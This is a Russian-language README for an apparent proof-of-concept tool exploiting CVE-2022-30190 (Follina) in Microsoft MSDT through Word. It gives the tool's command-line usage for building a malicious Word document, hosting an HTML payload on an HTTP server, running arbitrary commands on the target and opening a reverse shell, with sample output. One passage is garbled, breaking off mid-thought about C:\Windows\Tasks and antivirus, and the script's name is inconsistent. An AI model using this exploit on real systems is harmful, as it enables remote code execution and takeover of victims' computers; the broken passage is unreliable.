
Доказательство концепции для CVE-2022-30190
Уязвимость удаленного выполнения кода существует, когда MSDT вызывается через протокол URL из вызывающего приложения, такого как Word. Злоумышленник, успешно эксплуатирующий эту уязвимость, может запускать произвольный код с правами вызывающего приложения. Затем злоумышленник может устанавливать программы, просматривать, изменять или удалять данные, а также создавать новые учетные записи в контексте, допускаемом правами пользователя.
Создайте атаку MS-MSDT «Deathnote» с помощью вредоносного документа Microsoft Word и разверните полезную нагрузку с помощью HTTP-сервера.
usage: follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]
options:
-h, --help show this help message and exit
--command COMMAND, -c COMMAND
command to run on the target (default: Notepad)
--output OUTPUT, -o OUTPUT
output maldoc file (default: ./Deathnote.doc)
--interface INTERFACE, -i INTERFACE
network interface or IP address to host the HTTP server (default: eth0)
--port PORT, -p PORT port to serve the HTTP server (default: 8000)
Запускаем notepad.exe:
$ python3 Deathnote.py
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./Deathnote.doc
[+] serving html payload on :8000
Запускаем calc.exe:
$ python3 Deathnote.py -c "calc"

C:\Windows\Tasks. Он не удаляет бинарный файл. Это вызовет срабатывание антивируса, если только AV не отключен.Получить reverse shell :
python3 Deathnote.py -p 1234